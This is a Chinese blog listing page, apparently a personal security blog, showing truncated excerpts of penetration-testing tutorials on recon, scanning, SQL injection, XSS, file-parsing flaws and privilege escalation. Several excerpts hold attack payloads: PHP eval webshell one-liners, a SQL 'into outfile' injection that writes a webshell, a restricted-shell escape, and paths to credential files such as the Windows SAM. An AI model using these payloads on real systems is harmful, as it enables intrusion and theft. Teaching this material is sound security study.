孤的博客

漏洞库Vulhub环境安装部署步骤，漏洞复现流程https://www.wangan.com/docs/vulhubMiddleware-Vulnerability-detectionCVE、CMS、中间件漏洞检测利用合集https://github.com/mai-lang-chai/Middleware-Vulnerability-detection佩奇文库环境搭建，POC，漏洞原理全部集合在一个文库http://wiki.peiqi.tech/白阁文库白阁文库是白泽Sec团队维护

三个方向具体信息 操作 作用系统信息系统程序：系统版本，安装补丁 net config workstation/server查询简易系统信息 system 查询全部内容 wmic qfe get caption,description,hotfixid,installedon 查询已安装的补丁列表进程服务 tasklist /v 查询正在运行的进程 wmic product get name,version 查询所有安装过的软件及版本 wmic service list brief

攻击成功，并得到一个shell，但是这里却只是一个简单的shell，首先需要把它转换为一个交互式的shell在简单shell中直接按删除键是不行的，要按住ctrl键之后，再按住删除键才可以，其他键的使用也一样命令python -c 'import pty;pty.spawn("/bin/bash")'现在已经进入了一个交互的shell了，但是可以看到这只是一个普通的用户，所以我们要把他提...

wpscan --update 在线更新更新失败那就将包下载到本地更新wget http://blog.dsb.ink/wpscan/wp.zipunzip wp.zip将刚刚wpscan的解压文件 放到apache的目录里设置wpscan的更新配置文件打开本地的服务器service apache2 start更新...

使用ssh登录restricted 受限的受限的shell命令，rbash，百度搜索rbash，发现有绕过方法，进行查找，并尝试Vi编辑，输入，到了/bin/bashBASH_CMDS[a]=/bin/sh;a /bin/bash此时就变成了bash的shell然后导入环境变量，目的为了能够使用哪些环境变量中的命令sudo尝试提权尝试提权先转换到 jerry用户，至于为什么...

IIS6.0-文件解析漏洞IIS6.0-目录解析漏洞IIS7.0-畸形解析漏洞apache-%0a解析漏洞apache-未知后缀名解析漏洞nginx-访问文件解析漏洞nginx-畸形解析漏洞nginx-截断解析漏洞IIS 6.01、目录解析 example：www.xxx.com/xxx.asp/xxx.jpgIIS服务器会把.asp .asa目录下的文件都解析成asp文件。其...

测试语句<?php phpinfo();?>最初语句<?php @eval($_POST[cmd]);?><?php @eval($_REQUEST[cmd]);?>前端的传输方式：GET 数据从url提交POST 数据采用隐蔽方式提交REQUEST 即支持GET方式、又支持POST方式后端执行函数：eval()assert()pr...

域名相关信息域名IP、ns、MX、子域名、旁站、C段 nslookup ip 8.8.8.8 获得其域名IP，可多地ping nslookup -qt=mx xupe.edu.cn dnsenum xupt.ed.cn 获得其ns、MX、并判断是否有与传送漏洞 dnsenum xupt.edu.cn -f host.txt --threads 16 目标 字典 线程 并爆...

原理 在程序开发时，开发人员没有对可以进行数据库交互的地方进行严格过滤。导致用户在提交数据时，可以将构造的恶意sql语句提交到数据库进行执行。个人总结：sql注入就是恶意sql语句在数据库被执行攻击方式（分类、步骤、工具）分类：基于位置点 get post http头部字段（user-agent、cookie、referer、IP） 基于方法 布尔 ...

原理开发者在开发时，对客户端过滤严格，导致恶意的javascript代码在浏览器上执行跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过用户本地浏览器执行的，所以xss漏洞关键就是寻找参数未过滤的...

0×1登录功能 20×2找回密码功能 30×3注册功能 40×4支付功能 40×5账户功能 50×6个人中心 50×7 评论功能 60×8 上传功能 70×9 订单功能 70×10 收获地址功能 70×1登录功能1、账号密码能否爆破 即验证码是否有效2、登录权限是否能绕过3、登录账号能否被枚举4、登录账号是否存在弱口令5、验证码是否能被绕过 （...

Windows 系统C:\boot.ini 查看系统版本C:\windows\system32\inetsrv\MetaBase.xml IIS配置文件 C:\windows\repair\sam 存储Windows系统初次安装的密码C:\Program Files\mysql\my.ini mysql配置C:\Program Files\mysql\data\m...

一、union select 后写入最常见的写入方式，union select 后跟 into outfile 语句1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\shell.php" --+1' union select 1,2,'&l...

traceroutetraceroute是用来检测发出数据包的主机到目标主机之间所经过的网关数量的工具。traceroute的原理是试图以最小的TTL（存活时间）发出探测包来跟踪数据包到达目标主机所经过的网关，然后监听一个来自网关ICMP的应答。发送数据包的大小默认为38个字节。原理：程序利用增加存活时间（TTL）来实现其功能。每当数据包(3个数据包包括源地址，目的地址和包发出的时间标签)经过...

pingPING (Packet Internet Groper)，因特网包探索器，用于测试网络连接量的程序。Ping发送一个ICMP(Internet Control Messages Protocol）即因特网信报控制协议；回声请求消息给目的地并报告是否收到所希望的ICMPecho （ICMP回声应答）。它是用来检查网络是否通畅或者网络连接速度的命令。Ping非常容易被屏蔽。arp-sc...

在渗透测试的过程中，端口扫描是必须的。也是很重要的一个步骤。使用工具：nmap1、nmap简单扫描nmap默认发送一个ARP的PING数据包，来探测目标主机1-10000范围内所开放的所有端口命令语法：nmap 其中：target ip address是扫描的目标主机的ip地址2、nmap简单扫描，并对结果返回详细的描述输出命令语法：namp -vv 介绍：-vv参数设置对结果的...

NessusNessus 是系统漏洞扫描与分析软件，非常强大。官网下载： https://www.tenable.com/downloads/nessus然后安装。openVASOpenVAS是开放式漏洞评估系统，也可以说它是一个包含着相关工具的网络扫描器。其核心部件是一个服务器，包括一套网络漏洞测试程序，可以检测远程系统和应用程序中的安全问题。OpenVAS是一个客户端/服务器架构...

xprobe2XProbe是一款远程主机操作系统探查工具。开发者基于和Nmap相同的一些技术（same techniques），并加入了自己的创新。Xprobe通过ICMP协议来获得指纹。最新版本是Xprobe2.0.3版本,Xprobe2通过模糊矩阵统计分析主动探测数据报对应的ICMP数据报特征,进而探测得到远端操作系统的类型。但是对比较老的操作系统,识别效果非常高,对新内核系统则识别效果不太...

被动信息收集公开渠道可获得的信息与目标系统不产生直接交互尽量避免留下痕迹收集的内容IP地址段、域名信息、邮件地址、文档图片数据、公司地址、公司组织架构、联系电话/传真号码、人员姓名/职务、公开的商业信息等；DNS信息收集——nslookup非交互式 root@kali:~# nslookup sina.comServer: 192.168.206.2Address: 19...

目录工具描述参数解释爆破子域名自定义字典爆破子域名反查指定范围的IP段反查指定域名附近的IP段反查指定域名所在的C段IP扫描优化：自定义超时时间、多线程工具描述Fierce是一款IP、域名互查的DNS工具，可进行域传送漏洞检测、字典爆破子域名、反查IP段、反查指定域名上下一段IP，属于一款半轻量级的多线程信息收集用具。Fierce可尝试建立HTTP连接以确定子域名是否存在，...

LINUXuname -a 查看当前系统版本、内核等whoami 查看当前使用的用户pwd 查看当前所在路径ifconfig -a 查看网卡信息，IP、MAC等iptables -L 查看防火墙规则dpkg -l 查看已经安装的软件ps -aux 查看进程netstat -nr 查看网关netstat -ano 查看打开的端口/etc/passwd...

参数选择必须选择pitchfork模式设置字典options设置开始爆破结果爆破成功

在信息收集中目标的域名相关的信息是很重要的，比如：注册信息域名对应的真实IP域名服务器邮件服务器子域名IP反查旁站C段所要收集的信息及其工具注册信息----whois、https://www.aizhan.com/、http://www.7c.com/、https://www.yougetsignal.com/域名对应的真实IP—nslookup、dig域名服务器—fi...

概述命令执行漏洞是指可以随意执行系统命令，属于高危漏洞之一，也属于代码执行范围内导致原因代码过滤不严格系统漏洞调用第三方组件如：php(system(),shell_exec(),exec(),eval())、 java(struts2)、thinkphp(老牌的php框架）等&、&&、|、||再windows和linux的命令执行中，都有同样的效果&...

本地提权目前系统都是多用户操作系统，可以登录多个账户，实现权限的隔离，针对不同的应用，对应不同的账户，不同的账户在对应不同的权限；本地提权一般用于已经获取到了本地低权限的账号，希望获取更高的权限，实现对目标的进一步控制；简单地说，本地提权漏洞就是说一个本来非常低权限、受限制的用户，可以提升到系统至高无上的权限，权限控制是WINDOWS、Linux等系统安全的基石，也是一切安全软件的基石，一旦...

whois域名注册信息查询whois 域名主要是收集域名注册信息。如注册时间、过期日期、服务商、注册人的信息等。域名解析查询host 域名nslookup 域名dig 域名 #通过向域名服务器查询子域名查询fierce -dns 域名 #可以查询子域名及其ipdnsenum 域名 #子域名枚举，速度快，且分类清晰域名详细信息查询可以查询域名的详细信息...